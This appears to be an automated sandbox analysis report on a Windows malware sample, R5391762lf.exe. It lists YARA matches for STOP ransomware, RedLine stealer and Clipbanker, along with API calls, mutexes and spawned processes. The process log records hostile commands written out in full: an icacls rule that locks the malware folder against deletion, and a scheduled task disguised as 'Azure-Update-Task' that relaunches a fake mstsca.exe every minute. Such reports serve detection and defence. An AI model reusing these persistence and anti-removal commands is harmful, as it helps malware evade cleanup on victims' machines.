Source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000013.00000002.1703479175.0000000000B3C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.3283516956.0000000000AC0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001E.00000002.2677244146.0000000000880000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000013.00000002.1703198337.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001B.00000002.2060305239.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000010.00000002.1620958954.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000020.00000002.3283314593.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: Process Memory Space: R5391762lf.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: R5391762lf.exe PID: 7360, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: R5391762lf.exe PID: 7500, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: R5391762lf.exe PID: 7508, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.spre.troj.spyw.evad.winEXE@45/1390@9/5

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 2_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

2_2_00411900

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_044987C6 CreateToolhelp32Snapshot,Module32First,

0_2_044987C6

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

2_2_0040D240

Source: C:\Users\user\Desktop\R5391762lf.exe

File created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03

Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: --Admin	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: IsAutoStart	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: IsTask	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: --ForNetRes	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: IsAutoStart	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: IsTask	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: --Task	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: --AutoStart	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: --Service	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: X1P	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: --Admin	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: runas	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: x2Q	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: x*P	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: C:\Windows\	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: D:\Windows\	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: 7P	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: %username%	2_2_00419F90
Source: C:\Users\user\Desktop\R5391762lf.exe	Command line argument: F:\	2_2_00419F90

Source: R5391762lf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\R5391762lf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\R5391762lf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: R5391762lf.exe	String found in binary or memory: set-addPolicy
Source: R5391762lf.exe	String found in binary or memory: id-cmc-addExtensions
Source: R5391762lf.exe	String found in binary or memory: set-addPolicy
Source: R5391762lf.exe	String found in binary or memory: id-cmc-addExtensions
Source: R5391762lf.exe	String found in binary or memory: set-addPolicy
Source: R5391762lf.exe	String found in binary or memory: id-cmc-addExtensions
Source: R5391762lf.exe	String found in binary or memory: set-addPolicy
Source: R5391762lf.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\R5391762lf.exe

File read: C:\Users\user\Desktop\R5391762lf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe"
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe"
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Section loaded: srvcli.dll	Jump to behavior
